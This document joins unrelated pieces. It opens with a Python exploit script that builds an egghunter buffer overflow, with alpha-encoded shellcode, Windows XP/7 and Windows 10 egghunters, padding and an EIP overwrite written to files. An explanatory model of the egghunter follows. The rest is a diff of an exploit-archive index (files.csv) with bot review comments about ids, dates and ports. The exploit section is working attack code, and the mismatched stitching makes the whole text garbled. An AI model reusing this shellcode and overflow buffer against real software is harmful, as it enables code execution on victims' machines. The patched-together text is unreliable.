#--------------------------------------------------- EGG Shellcode Generation ---------------------------------------------------
#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"
f = open ("egg.txt", "w")
f.write(egg)
f.close()
#----------------------------------------------- EGG Hunter Shellcode Generation ----------------------------------------------
#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters
# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter = "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x70\x66\x4c\x4c\x78\x4b\x6b\x30"
egghunter += "\x49\x6b\x54\x63\x42\x55\x74\x4a\x66\x51\x69\x4b"
egghunter += "\x36\x51\x38\x52\x36\x33\x52\x73\x36\x33\x36\x33"
egghunter += "\x38\x33\x4f\x30\x71\x76\x4d\x51\x6b\x7a\x39\x6f"
egghunter += "\x66\x6f\x47\x32\x36\x32\x4d\x50\x59\x6b\x59\x50"
egghunter += "\x33\x44\x57\x78\x43\x5a\x66\x62\x72\x78\x78\x4d"
egghunter += "\x44\x6e\x73\x6a\x7a\x4b\x37\x62\x52\x4a\x71\x36"
egghunter += "\x61\x48\x55\x61\x69\x59\x6f\x79\x79\x72\x70\x64"
egghunter += "\x59\x6f\x75\x43\x73\x6a\x6e\x63\x57\x4c\x71\x34"
egghunter += "\x47\x70\x42\x54\x76\x61\x72\x7a\x57\x4c\x37\x75"
egghunter += "\x74\x34\x7a\x76\x6c\x78\x72\x57\x46\x50\x76\x50"
egghunter += "\x63\x44\x6d\x59\x59\x47\x4e\x4f\x71\x65\x4e\x31"
egghunter += "\x6e\x4f\x51\x65\x38\x4e\x79\x6f\x4b\x57\x41\x41"
# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 = "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"
eip = "\x4d\x37\x41"
buffer = egghunter + "\x41" * (268 - len(egghunter)) + eip
f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "\x41" * (268 - len(egghunter10)) + eip
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()
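As an added illustration (not part of Peyman Forouzan's exploit), the Python below models what the two stages above rely on: the hunter scans memory for the doubled tag w00tw00t and transfers control to the bytes after it, and the stage-1 buffer must fit the 268-byte offset and survive being pasted into a text field, which is why the script uses alpha-encoded shellcode. It also decodes the 3-byte EIP value "\x4d\x37\x41" to 0x0041374D on the assumption that the field's terminating NUL supplies the fourth byte; that assumption, the function names and the constructed memory image are this example's own.

```python
import re
import struct

EGG_TAG = b"w00t"            # the 4-byte tag; the egg in memory is the tag twice, then shellcode
OFFSET_TO_EIP = 268          # from the script above: hunter + filler up to the saved return address
PRINTABLE = re.compile(rb"^[\x20-\x7e]*$")


def egg_stage(tag: bytes, shellcode: bytes) -> bytes:
    """Stage 2 as written to egg.txt: tag+tag followed by the real payload."""
    return tag * 2 + shellcode


def find_egg(memory: bytes, tag: bytes = EGG_TAG) -> int:
    """What the egghunter does at runtime, in software: locate tag+tag and return the offset
    of the shellcode that follows (the hunter jumps to that address once found)."""
    marker = tag * 2
    idx = memory.find(marker)
    if idx < 0:
        raise LookupError("egg not found in memory")
    return idx + len(marker)


def build_stage(hunter: bytes, eip: bytes, offset: int = OFFSET_TO_EIP, filler: bytes = b"A") -> bytes:
    """Assemble hunter + padding + EIP as the script does, refusing anything a text field would mangle."""
    if len(hunter) > offset:
        raise ValueError(f"hunter is {len(hunter)} bytes, exceeds the {offset}-byte offset")
    if not PRINTABLE.fullmatch(hunter + eip):
        raise ValueError("payload contains non-printable bytes; the field is pasted text")
    return hunter + filler * (offset - len(hunter)) + eip


def eip_address(eip: bytes) -> int:
    """Decode the little-endian return address. The script writes only 3 bytes ("M7A"); the
    assumption here is that the field's terminating NUL supplies the high byte."""
    return struct.unpack("<I", eip.ljust(4, b"\x00"))[0]


if __name__ == "__main__":
    # Constructed memory image: zeros, some junk, then the egg, then the (fake) shellcode.
    shellcode = b"\x90" * 8
    memory = b"\x00" * 40 + b"junkjunk" + egg_stage(EGG_TAG, shellcode) + b"\x00" * 16
    print("shellcode at offset", hex(find_egg(memory)))
    print("return address", hex(eip_address(b"\x4d\x37\x41")))
    stage1 = build_stage(b"\x4c\x4c\x4c\x4c\x5f", b"\x4d\x37\x41")   # the script's hunter prefix
    print("stage-1 length", len(stage1))
```

The prefix \x4c\x4c\x4c\x4c\x5f ("LLLL_") at the start of both hunters is DEC ESP x4 followed by POP EDI, which sets up the register the alpha decoder expects; note that "_" is printable but not alphanumeric, so a field that only accepts letters and digits would already break the stage-1 buffer, which is the kind of constraint the printable check above is meant to surface before a live test.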

@ -6304,6 +6304,7 @@ id,file,description,date,author,type,platform,port
46337,exploits/android/dos/46337.sh,"AirDroid 4.2.1.6 - Denial of Service",2019-02-11,s4vitar,dos,android,
46338,exploits/windows/dos/46338.py,"FutureDj Pro 1.7.2.0 - Denial of Service",2019-02-11,Achilles,dos,windows,
46343,exploits/windows/dos/46343.py,"NordVPN 6.19.6 - Denial of Service (PoC)",2019-02-11,"Alejandra Sánchez",dos,windows,
46564,exploits/linux/dos/46564.txt,"libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons",2019-03-19,"Google Security Research",dos,linux,
46356,exploits/android/dos/46356.txt,"Android - binder Use-After-Free via fdget() Optimization",2019-02-12,"Google Security Research",dos,android,
46357,exploits/android/dos/46357.txt,"Android - binder Use-After-Free of VMA via race Between reclaim and munmap",2019-02-12,"Google Security Research",dos,android,
46358,exploits/asp/dos/46358.py,"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow",2019-02-12,"Kaustubh G. Padwad",dos,asp,80
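Review bot: the 46564 row is inserted between 46343 and 46356, breaking the ascending id order the surrounding dos rows keep and that the other rows added in this commit follow (they are appended after the highest existing id of their section); place it directly before 46565 with the rest of the 2019-03-19 entries.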
@ -6358,6 +6359,13 @@ id,file,description,date,author,type,platform,port
46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
46553,exploits/windows/dos/46553.py,"WinMPG Video Convert 9.3.5 - Denial of Service",2019-03-18,Achilles,dos,windows,
46554,exploits/windows/dos/46554.py,"WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service",2019-03-18,Achilles,dos,windows,
46565,exploits/multiple/dos/46565.txt,"Google Chrome < M73 - Double-Destruction Race in StoragePartitionService",2019-03-19,"Google Security Research",dos,multiple,
46566,exploits/multiple/dos/46566.txt,"Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter",2019-03-19,"Google Security Research",dos,multiple,
46567,exploits/windows/dos/46567.html,"Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML",2019-03-19,"Google Security Research",dos,windows,
46568,exploits/windows/dos/46568.html,"Microsoft VBScript - VbsErase Memory Corruption",2019-03-19,"Google Security Research",dos,windows,
46569,exploits/windows/dos/46569.txt,"Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject",2019-03-19,"Google Security Research",dos,windows,
46570,exploits/multiple/dos/46570.txt,"Google Chrome < M73 - MidiManagerWin Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
46571,exploits/multiple/dos/46571.txt,"Google Chrome < M73 - FileSystemOperationRunner Use-After-Free",2019-03-19,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
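Review bot: 46567 and 46569 are filed with type `dos`, yet their advisories describe a VBScript execution policy bypass and a Flash click2play bypass (the 46567 header says Class: Security Feature Bypass), neither of which is a crash; if `dos` is the catch-all bucket for these PoCs, the description should at least carry the class so searches do not treat them as denial-of-service findings.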
@ -10362,6 +10370,7 @@ id,file,description,date,author,type,platform,port
46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,
46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows,
46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows,
46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
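Review bot: the 46561 row records 2019-03-19 while the script's own header says Date: 2019-03-18, whereas the Netartmedia rows in this commit copy their advisory date 19.03.2019 verbatim; settle on one convention for the date column (advisory date or publication date) and apply it to every row in the commit.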
@ -17258,6 +17267,7 @@ id,file,description,date,author,type,platform,port
46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
46547,exploits/windows/remote/46547.py,"Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow",2019-03-15,"Joseph McDonagh",remote,windows,25
46556,exploits/multiple/remote/46556.rb,"BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)",2019-03-18,Metasploit,remote,multiple,3181
46572,exploits/java/remote/46572.rb,"Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE (Metasploit)",2019-03-19,Metasploit,remote,java,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
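Review bot: the 46572 row leaves the port column empty while the neighbouring remote rows carry one (25 for 46547, 3181 for 46556); if the Jenkins module targets a fixed default port, record it here so port-based searches find the entry.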
@ -40998,4 +41008,10 @@ id,file,description,date,author,type,platform,port
46549,exploits/php/webapps/46549.txt,"Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities",2019-03-15,"Gionathan Reale",webapps,php,80
46550,exploits/php/webapps/46550.txt,"Laundry CMS - Multiple Vulnerabilities",2019-03-15,"Mehmet EMIROGLU",webapps,php,80
46551,exploits/php/webapps/46551.php,"Moodle 3.4.1 - Remote Code Execution",2019-03-15,"Darryn Ten",webapps,php,80
46555,exploits/php/webapps/46555.txt,"TheCarProject v2 - Multiple SQL Injection",2019-03-18,"Mehmet EMIROGLU",webapps,php,80
46555,exploits/php/webapps/46555.txt,"TheCarProject 2 - Multiple SQL Injection",2019-03-18,"Mehmet EMIROGLU",webapps,php,80
46557,exploits/php/webapps/46557.txt,"Gila CMS 1.9.1 - Cross-Site Scripting",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
46558,exploits/php/webapps/46558.txt,"MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting",2019-03-19,0xB9,webapps,php,80
46559,exploits/php/webapps/46559.txt,"eNdonesia Portal 8.7 - Multiple Vulnerabilities",2019-03-19,"Mehmet EMIROGLU",webapps,php,80
46560,exploits/php/webapps/46560.txt,"Netartmedia Event Portal 2.0 - 'Email' SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
46562,exploits/php/webapps/46562.txt,"Netartmedia PHP Mall 4.1 - SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
46563,exploits/php/webapps/46563.txt,"Netartmedia Real Estate Portal 5.0 - SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
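Review bot: two rows carry id 46555, one described as "TheCarProject v2 - Multiple SQL Injection" and one as "TheCarProject 2 - Multiple SQL Injection"; the rendering drops the +/- markers, so if this is a rename (old line removed, new line added) it is fine, but if both are additions one must be dropped, since id is the key of files.csv and a duplicate breaks lookups by id.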
